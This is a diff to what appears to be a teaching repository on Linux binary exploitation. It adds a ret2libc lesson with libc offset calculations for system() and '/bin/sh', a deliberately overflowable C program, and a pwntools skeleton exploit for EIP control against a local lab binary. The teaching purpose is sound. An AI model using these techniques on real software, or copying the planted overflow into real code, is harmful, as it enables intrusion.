pwnthemole
diff --git a/‎README.md
Lines changed: 9 additions & 5 deletions b/‎README.md
Lines changed: 9 additions & 5 deletions
diff --git a/‎lessons/2_linux_binaries/lessonplan.md b/‎lessons/2_linux_binaries/lessonplan.md
diff --git a/‎lessons/5_protections/lessonplan.md b/‎lessons/5_protections/lessonplan.md
diff --git a/‎lessons/7_bypass_nx_ret2libc/lessonplan.md
Lines changed: 259 additions & 2 deletions b/‎lessons/7_bypass_nx_ret2libc/lessonplan.md
Lines changed: 259 additions & 2 deletions
diff --git a/‎lessons/8_aslr/lessonplan.md b/‎lessons/8_aslr/lessonplan.md
@@ -20,13 +20,13 @@ the video.
 ## Syllabus
 
 1. [Setting Up the Environment]
-2. How Does a Linux Binary Work?
+2. [How Does a Linux Binary Work?]
 3. [Introduction to PEDA and Pwntools]
 4. [Classic Exploitation Technique]
-5. Linux Binary Protections
+5. [Linux Binary Protections]
 6. [Bypassing NX with Return Oriented Programming]
 7. [Bypassing NX with Ret2Libc]
-8. ASLR in Depth
+8. [ASLR in Depth]
 9. [Bypassing ASLR/NX with Ret2PLT]
 10. [Bypassing ASLR/NX with GOT Overwrite]
 11. [Memory Leaks]
@@ -36,16 +36,20 @@ the video.
 
 ## Future Syllabus
 
-1. Heap Overflows
-2. Use After Free
+1. A History Lesson: Heap Metadata Attacks
+2. Heap Overflows
+3. Use After Free
 
 [Introduction to Return Oriented Programming]: https://youtu.be/ruJXvxXzyU8
 [lesson plan]: https://github.com/nnamon/PracticalRet2Libc/blob/master/docs/lessonplans/1_practicalrop/lessonplan.md
 [Setting Up The Environment]: ./lessons/1_setting_up_environment/lessonplan.md
+[How Does a Linux Binary Work?]: ./lessons/2_linux_binaries/lessonplan.md
 [Introduction to PEDA and Pwntools]: ./lessons/3_intro_to_tools/lessonplan.md
 [Classic Exploitation Technique]: ./lessons/4_classic_exploitation/lessonplan.md
+[Linux Binary Protections]: ./lessons/5_protections/lessonplan.md
 [Bypassing NX with Return Oriented Programming]: ./lessons/6_bypass_nx_rop/lessonplan.md
 [Bypassing NX with Ret2Libc]: ./lessons/7_bypass_nx_ret2libc/lessonplan.md
+[ASLR in Depth]: ./lessons/8_aslr/lessonplan.md
 [Bypassing ASLR/NX with Ret2PLT]: ./lessons/9_bypass_ret2plt/lessonplan.md
 [Bypassing ASLR/NX with GOT Overwrite]: ./lessons/10_bypass_got/lessonplan.md
 [Memory Leaks]: ./lessons/11_memory_leaks/lessonplan.md
 
@@ -1,4 +1,261 @@
 # Bypassing NX with Ret2Libc
 
-<Talk about finding the base address of libc and directly jumping to it.>
-<No remote examples since ASLR is still off>
+We were able to pick from a wealth of ROP gadgets to construct the ROP chain in
+the previous section because the binary was huge. Now, what happens if the
+binary we have to attack is not large enough to provide us the gadgets we need?
+
+One possible solution, since ASLR is disabled, would be to search for our
+gadgets in the shared libraries loaded by the program such as libc.
+However, if we had these addresses into libc, we could simplify our exploit to
+reuse useful functions. One such useful function could be the amazing `system()`
+function.
+
+## Investigating Shared Libraries
+
+To investigate this, we can create a diagnostic binary to introspectively look
+at the virtual memory map and to print us the resolved `system()` address. The
+[source][1] is as follows:
+
+```c
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <stdio.h>
+#include <dlfcn.h>
+#include <unistd.h>
+
+
+int main() {
+    puts("This program helps visualise where libc is loaded.\n");
+    int pid = getpid();
+    char command[500];
+    puts("Memory Layout: ");
+    sprintf(command, "cat /proc/%d/maps", pid);
+    system(command);
+    puts("\nFunction Addresses: ");
+    printf("System@libc 0x%lx\n", dlsym(RTLD_NEXT, "system"));
+    printf("PID: %d\n", pid);
+    puts("Press enter to continue.");
+    read(0, command, 1);
+}
+```
+
+I have compiled two versions of the binary, a [32 bit version][2] and a [64 bit
+version][3].
+
+Running the 32 bit one:
+
+```shell
+amon@bethany:~/sproink/linux-exploitation-course/lessons/7_bypass_nx_ret2libc/build$ ./1_reveal_addresses
+This program helps visualise where libc is loaded.
+
+Memory Layout:
+08048000-08049000 r-xp 00000000 00:27 329                                /vagrant/lessons/7_bypass_nx_ret2libc/build/1_reveal_addresses
+08049000-0804a000 r--p 00000000 00:27 329                                /vagrant/lessons/7_bypass_nx_ret2libc/build/1_reveal_addresses
+0804a000-0804b000 rw-p 00001000 00:27 329                                /vagrant/lessons/7_bypass_nx_ret2libc/build/1_reveal_addresses
+0804b000-0806c000 rw-p 00000000 00:00 0                                  [heap]
+f7e0f000-f7e10000 rw-p 00000000 00:00 0
+f7e10000-f7fbf000 r-xp 00000000 08:01 256310                             /lib/i386-linux-gnu/libc-2.23.so
+f7fbf000-f7fc0000 ---p 001af000 08:01 256310                             /lib/i386-linux-gnu/libc-2.23.so
+f7fc0000-f7fc2000 r--p 001af000 08:01 256310                             /lib/i386-linux-gnu/libc-2.23.so
+f7fc2000-f7fc3000 rw-p 001b1000 08:01 256310                             /lib/i386-linux-gnu/libc-2.23.so
+f7fc3000-f7fc6000 rw-p 00000000 00:00 0
+f7fc6000-f7fc9000 r-xp 00000000 08:01 256309                             /lib/i386-linux-gnu/libdl-2.23.so
+f7fc9000-f7fca000 r--p 00002000 08:01 256309                             /lib/i386-linux-gnu/libdl-2.23.so
+f7fca000-f7fcb000 rw-p 00003000 08:01 256309                             /lib/i386-linux-gnu/libdl-2.23.so
+f7fd4000-f7fd6000 rw-p 00000000 00:00 0
+f7fd6000-f7fd8000 r--p 00000000 00:00 0                                  [vvar]
+f7fd8000-f7fd9000 r-xp 00000000 00:00 0                                  [vdso]
+f7fd9000-f7ffb000 r-xp 00000000 08:01 256300                             /lib/i386-linux-gnu/ld-2.23.so
+f7ffb000-f7ffc000 rw-p 00000000 00:00 0
+f7ffc000-f7ffd000 r--p 00022000 08:01 256300                             /lib/i386-linux-gnu/ld-2.23.so
+f7ffd000-f7ffe000 rw-p 00023000 08:01 256300                             /lib/i386-linux-gnu/ld-2.23.so
+fffdd000-ffffe000 rw-p 00000000 00:00 0                                  [stack]
+
+Function Addresses:
+System@libc 0xf7e4ada0
+PID: 20738
+Press enter to continue.
+```
+
+Note the base address of libc-2-2.23.so (0xf7e10000) and the resolved address of
+system (0xf7e4ada0). Let's subtract the address of the base address from the
+address of system to get the system offset.
+
+```shell
+In [15]: 0xf7e4ada0-0xf7e10000
+Out[15]: 241056
+In [16]: hex(0xf7e4ada0-0xf7e10000)
+Out[16]: '0x3ada0'
+```
+
+Take note of that offset, 0x3ada0. Next, we can disassemble the libc shared
+object and look for the start of the system function.
+
+
+```shell
+ubuntu@ubuntu-xenial:/vagrant/lessons/7_bypass_nx_ret2libc/build$ objdump -d /lib/i386-linux-gnu/libc-2.23.so  | grep system
+0003ada0 <__libc_system@@GLIBC_PRIVATE>:
+   3adb4:	74 0a                	je     3adc0 <__libc_system@@GLIBC_PRIVATE+0x20>
+00112d60 <svcerr_systemerr@@GLIBC_2.0>:
+```
+
+That's a bingo. Notice how the offset we calculated previously is the same as
+the address of `__libc_system@@GLIBC_PRIVATE`.
+
+We can repeat this with the 64 bit one:
+
+```shell
+This program helps visualise where libc is loaded.
+
+Memory Layout:
+00400000-00401000 r-xp 00000000 08:06 17434884                           /home/amon/sproink/linux-exploitation-course/lessons/7_bypass_nx_ret2libc/build/2_reveal_addresses64
+00600000-00601000 r--p 00000000 08:06 17434884                           /home/amon/sproink/linux-exploitation-course/lessons/7_bypass_nx_ret2libc/build/2_reveal_addresses64
+00601000-00602000 rw-p 00001000 08:06 17434884                           /home/amon/sproink/linux-exploitation-course/lessons/7_bypass_nx_ret2libc/build/2_reveal_addresses64
+01609000-0162a000 rw-p 00000000 00:00 0                                  [heap]
+7f649ccfe000-7f649cebd000 r-xp 00000000 08:06 262743                     /lib/x86_64-linux-gnu/libc-2.23.so
+7f649cebd000-7f649d0bd000 ---p 001bf000 08:06 262743                     /lib/x86_64-linux-gnu/libc-2.23.so
+7f649d0bd000-7f649d0c1000 r--p 001bf000 08:06 262743                     /lib/x86_64-linux-gnu/libc-2.23.so
+7f649d0c1000-7f649d0c3000 rw-p 001c3000 08:06 262743                     /lib/x86_64-linux-gnu/libc-2.23.so
+7f649d0c3000-7f649d0c7000 rw-p 00000000 00:00 0
+7f649d0c7000-7f649d0ca000 r-xp 00000000 08:06 262742                     /lib/x86_64-linux-gnu/libdl-2.23.so
+7f649d0ca000-7f649d2c9000 ---p 00003000 08:06 262742                     /lib/x86_64-linux-gnu/libdl-2.23.so
+7f649d2c9000-7f649d2ca000 r--p 00002000 08:06 262742                     /lib/x86_64-linux-gnu/libdl-2.23.so
+7f649d2ca000-7f649d2cb000 rw-p 00003000 08:06 262742                     /lib/x86_64-linux-gnu/libdl-2.23.so
+7f649d2cb000-7f649d2f1000 r-xp 00000000 08:06 262410                     /lib/x86_64-linux-gnu/ld-2.23.so
+7f649d4cd000-7f649d4d0000 rw-p 00000000 00:00 0
+7f649d4ee000-7f649d4f0000 rw-p 00000000 00:00 0
+7f649d4f0000-7f649d4f1000 r--p 00025000 08:06 262410                     /lib/x86_64-linux-gnu/ld-2.23.so
+7f649d4f1000-7f649d4f2000 rw-p 00026000 08:06 262410                     /lib/x86_64-linux-gnu/ld-2.23.so
+7f649d4f2000-7f649d4f3000 rw-p 00000000 00:00 0
+7ffd9f7b7000-7ffd9f7d8000 rw-p 00000000 00:00 0                          [stack]
+7ffd9f7e0000-7ffd9f7e2000 r--p 00000000 00:00 0                          [vvar]
+7ffd9f7e2000-7ffd9f7e4000 r-xp 00000000 00:00 0                          [vdso]
+ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
+
+Function Addresses:
+System@libc 0x7f649cd43390
+PID: 16781
+Press enter to continue.
+```
+
+Calculating the difference.
+
+```shell
+In [17]: 0x7f649cd43390-0x7f649ccfe000
+Out[17]: 283536
+In [18]: hex(0x7f649cd43390-0x7f649ccfe000)
+Out[18]: '0x45390'
+```
+
+Finding the address of system in the 64 bit libc binary.
+
+```shell
+ubuntu@ubuntu-xenial:/vagrant/lessons/7_bypass_nx_ret2libc/build$ objdump -d /lib/x86_64-linux-gnu/libc-2.23.so | grep system
+0000000000045390 <__libc_system@@GLIBC_PRIVATE>:
+   45393:	74 0b                	je     453a0 <__libc_system@@GLIBC_PRIVATE+0x10>
+0000000000137c20 <svcerr_systemerr@@GLIBC_2.2.5>:
+```
+
+And we have another match.
+
+## Calculating Addresses
+
+This is useful information as now we have a way to calculate the addresses of
+useful functions given the base address of libc. Since shared objects are mapped
+at the same location without randomisation due to ASLR being disabled, we can
+very easily find the addresses of useful things such as the `system()` function
+and the `/bin/sh` string by examining the libc shared object on its own.
+
+To make life easier, the ['libc-database' toolset by Niklas Baumstark][4],
+provides helper scripts to build a libc database, identify versions of libc from
+information leaks, and dump useful offsets. In the vagrant provisioning script,
+I have already added the pertinent libc versions used in the exercises.
+
+```shell
+ubuntu@ubuntu-xenial:~/libc-database$ ./identify /lib/i386-linux-gnu/libc-2.23.so
+id local-03ffe08ba6d5e7f5b1d647f6a14e6837938e3bed
+ubuntu@ubuntu-xenial:~/libc-database$ ./dump local-03ffe08ba6d5e7f5b1d647f6a14e6837938e3bed
+offset___libc_start_main_ret = 0x18637
+offset_system = 0x0003ada0
+offset_dup2 = 0x000d6190
+offset_read = 0x000d5980
+offset_write = 0x000d59f0
+offset_str_bin_sh = 0x15b82b
+ubuntu@ubuntu-xenial:~/libc-database$
+```
+
+## Exploiting a Minimalist Vulnerable Binary
+
+Let's do the opposite of what we did the last section. Instead of attacking a
+bloated binary, we are going to attack a really lean and mean one. Something
+[like this][5]:
+
+```c
+#include <stdio.h>
+#include <stdlib.h>
+
+void vuln() {
+    char buffer[64];
+    read(0, buffer, 96);
+}
+
+int main() {
+    vuln();
+}
+```
+
+Running the [binary][6]:
+
+```shell
+ubuntu@ubuntu-xenial:/vagrant/lessons/7_bypass_nx_ret2libc/build$ ./3_vulnerable
+TEST
+ubuntu@ubuntu-xenial:/vagrant/lessons/7_bypass_nx_ret2libc/build$
+```
+
+It really does not do much. Here is the [skeleton exploit code][7] to achieve
+EIP control.
+
+```python
+#!/usr/bin/python
+
+from pwn import *
+
+def main():
+    # Start the process
+    p = process("../build/3_vulnerable")
+
+    # Print the pid
+    raw_input(str(p.proc.pid))
+
+    # Craft the payload
+    payload = "A"*76 + p32(0xdeadc0de)
+    payload = payload.ljust(96, "\x00")
+
+    # Send the payload
+    p.send(payload)
+
+    # Pass interaction to the user
+    p.interactive()
+
+if __name__ == "__main__":
+    main()
+```
+
+## Exercise 7.1: Writing the Final Exploit
+
+At this point, it is simply a matter of finding at which address is libc mapped
+onto and then calculating the addresses of useful functions from the offsets we
+dumped.
+
+Try to obtain a shell by making the necessary additions to the skeleton code.
+Please attempt to do this on your own before looking at the [solution][8].
+
+
+[1]: ./src/1_reveal_addresses.c
+[2]: ./build/1_reveal_addresses
+[3]: ./build/2_reveal_addresses64
+[4]: https://github.com/niklasb/libc-database
+[5]: ./src/2_vulnerable.c
+[6]: ./build/3_vulnerable
+[7]: ./scripts/1_skeleton.py
+[8]: ./script/2_final.py